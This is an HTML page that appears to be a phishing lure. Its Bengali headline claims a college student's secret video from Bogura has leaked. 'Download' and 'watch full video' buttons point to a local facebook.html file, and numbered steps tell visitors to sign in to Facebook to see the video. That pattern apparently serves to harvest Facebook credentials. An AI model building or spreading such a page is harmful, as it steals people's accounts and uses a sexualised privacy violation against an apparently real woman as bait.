<!DOCTYPE html>
<html>
<head>
	<title>বগুড়ায় কলেজ ছাত্রীর গোপন ভিডিও ফাঁস </title>
</head>
<body>
<center>
	<h1>বগুড়ায় কলেজ ছাত্রীর গোপন ভিডিও ফাঁস </h1>
	<img src="img.jpeg" style="width:90%;"> <br><br><br>

	
<buttom style="font-size:30px; color:white; border-style:solid; border-color:gray;" width:100%; padding:20px;>
 <a href="facebook.html" style="text-decoration:none;">
                <div class="featured-item">
                  
                  <h1 style="padding:30px;  width:100%; ">Downlod video</h1>
                </div>
  </a>
	
</buttom>
<br> <br> <br>

<buttom style="font-size:20px; color:white; border-style:solid; border-color:gray;" width:100%; padding:20px;>
 <a href="facebook.html" style="text-decoration:none;">
                <div class="featured-item">
                  
                  <h1 style="padding:30px;  width:100%; ">watch full video</h1>
                </div>
  </a>
	
</buttom>
	
	<h1 style="color:blue;"> Step-1</h1>
<h2>click on downlod or watch full video. </h2>
<br>
<h1 style="color:blue;"> Step-2</h1>
<h2> signup to your facebook account. </h2>
<br>
<h1 style="color:blue;"> Step-3</h1>
<h2> Enjoy your video.</h2>

</center>	
</body>
</html>
